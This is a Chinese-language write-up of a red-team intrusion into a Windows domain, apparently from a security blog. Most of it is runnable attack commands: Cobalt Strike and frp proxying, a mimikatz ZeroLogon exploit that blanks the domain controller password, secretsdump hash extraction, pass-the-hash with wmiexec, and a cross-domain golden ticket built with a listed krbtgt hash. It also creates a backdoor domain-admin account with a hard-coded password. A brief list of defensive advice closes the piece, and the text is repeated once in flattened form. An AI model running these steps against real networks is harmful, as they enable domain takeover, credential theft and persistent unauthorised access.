结合实战内网渗透思路总结
字数 1165 2025-08-29 08:31:35

内网渗透实战思路总结

1. 初始入侵与权限提升

1.1 初始入侵方式

  • 采用钓鱼攻击获取第一台外网服务器权限
  • 设置Cobalt Strike beacon响应为实时模式

1.2 信息收集

shell systeminfo  # 获取系统信息
  • 记录系统版本(如Win7)
  • 查看已安装补丁(示例中显示3个补丁)
  • 通过补丁信息寻找可利用漏洞

1.3 提权操作

  • 根据系统版本和补丁情况选择提权漏洞(示例使用MS14-058)
  • 提权成功后建立后门进行权限维持
  • 可设置计划任务等持久化手段

2. 内网探测与域环境分析

2.1 网络信息收集

shell ipconfig /all  # 查看网络配置
  • 识别是否存在域环境
  • 检查网卡配置(示例为双网卡)
  • 记录DNS服务器地址(示例为10.10.3.6)

2.2 内网主机扫描

  • 使用nbtscan工具扫描内网存活主机
  • 重点关注域控(DC)标志的主机
  • 记录域控计算机名和IP地址(后续票据攻击会用到)

3. 横向移动技术

3.1 漏洞利用准备

  • 上传mimikatz工具
  • 检查CVE-2020-1472(ZeroLogon)漏洞
lsadump::zerologon /target:域控IP /account:域控主机名$

3.2 代理搭建

  • 上传frpc.exe和frp.ini配置文件
  • 在渗透机设置端口映射接收连接
shell frpc.exe -c frp.ini  # 启动代理
  • 在Kali设置代理(示例使用7000端口)

3.3 ZeroLogon漏洞利用

shell mimikatz "lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit" "exit"
  • 成功后域控密码被置空
  • 使用secretsdump提取哈希值
proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名\$@域控ip
  • 记录关键哈希值(Administrator和krbtgt)

3.4 哈希传递攻击(PTH)

proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip

3.5 权限恢复与维持

  • 导出SAM、SYSTEM、SECURITY文件
  • 使用secretsdump提取原始机器码
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
  • 恢复域控原始密码
proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash

4. 跨域攻击技术

4.1 黄金票据制作

  • 使用mimikatz获取父子域SID
shell mimikatz "privilege::debug" "lsadump::lsa /patch /user:administrator$" "lsadump::trust /patch" "exit"
  • 黄金票据要点:
    • 用户名: administrator
    • 域名: 当前域控名.com
    • SID: 子域控SID
    • SIDs: 父域SID-519
    • krbtgt哈希: c696e9337845d8ada46612d047e40209

4.2 票据攻击执行

shell "kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209 /ptt" "exit"

4.3 备用跨域方案

  1. 开启远程桌面服务
shell net user test QWEasd123 /add /domain  # 创建域用户
shell net group "Domain Admin" test /add /domain  # 添加到域管理员组
  1. 通过RDP登录后执行黄金票据攻击
  2. 上传Cobalt Strike payload并使用PsExec上线

5. 工具与命令总结

5.1 关键工具

  • Cobalt Strike (CS): 用于命令控制
  • mimikatz: 提取凭证、执行票据攻击
  • impacket工具集: secretsdump, wmiexec等
  • frpc: 内网代理工具
  • nbtscan: 内网主机扫描

5.2 常用命令

# 信息收集
systeminfo
ipconfig /all

# 提权与横向移动
lsadump::zerologon
impacket-secretsdump
wmiexec.py

# 票据攻击
kerberos::golden
lsadump::lsa
lsadump::trust

# 权限维持
net user /add
net group /add

6. 防御建议

  1. 及时安装系统补丁,特别是MS14-058和CVE-2020-1472
  2. 监控异常的网络连接和代理行为
  3. 限制域管理员权限,实施最小权限原则
  4. 监控异常Kerberos票据生成和使用
  5. 定期检查域控上的用户和组变更
  6. 实施网络分段,限制内网横向移动
  7. 监控异常哈希传递行为
内网渗透实战思路总结 1. 初始入侵与权限提升 1.1 初始入侵方式 采用钓鱼攻击获取第一台外网服务器权限 设置Cobalt Strike beacon响应为实时模式 1.2 信息收集 记录系统版本(如Win7) 查看已安装补丁(示例中显示3个补丁) 通过补丁信息寻找可利用漏洞 1.3 提权操作 根据系统版本和补丁情况选择提权漏洞(示例使用MS14-058) 提权成功后建立后门进行权限维持 可设置计划任务等持久化手段 2. 内网探测与域环境分析 2.1 网络信息收集 识别是否存在域环境 检查网卡配置(示例为双网卡) 记录DNS服务器地址(示例为10.10.3.6) 2.2 内网主机扫描 使用nbtscan工具扫描内网存活主机 重点关注域控(DC)标志的主机 记录域控计算机名和IP地址(后续票据攻击会用到) 3. 横向移动技术 3.1 漏洞利用准备 上传mimikatz工具 检查CVE-2020-1472(ZeroLogon)漏洞 3.2 代理搭建 上传frpc.exe和frp.ini配置文件 在渗透机设置端口映射接收连接 在Kali设置代理(示例使用7000端口) 3.3 ZeroLogon漏洞利用 成功后域控密码被置空 使用secretsdump提取哈希值 记录关键哈希值(Administrator和krbtgt) 3.4 哈希传递攻击(PTH) 3.5 权限恢复与维持 导出SAM、SYSTEM、SECURITY文件 使用secretsdump提取原始机器码 恢复域控原始密码 4. 跨域攻击技术 4.1 黄金票据制作 使用mimikatz获取父子域SID 黄金票据要点: 用户名: administrator 域名: 当前域控名.com SID: 子域控SID SIDs: 父域SID-519 krbtgt哈希: c696e9337845d8ada46612d047e40209 4.2 票据攻击执行 4.3 备用跨域方案 开启远程桌面服务 通过RDP登录后执行黄金票据攻击 上传Cobalt Strike payload并使用PsExec上线 5. 工具与命令总结 5.1 关键工具 Cobalt Strike (CS): 用于命令控制 mimikatz: 提取凭证、执行票据攻击 impacket工具集: secretsdump, wmiexec等 frpc: 内网代理工具 nbtscan: 内网主机扫描 5.2 常用命令 6. 防御建议 及时安装系统补丁,特别是MS14-058和CVE-2020-1472 监控异常的网络连接和代理行为 限制域管理员权限,实施最小权限原则 监控异常Kerberos票据生成和使用 定期检查域控上的用户和组变更 实施网络分段,限制内网横向移动 监控异常哈希传递行为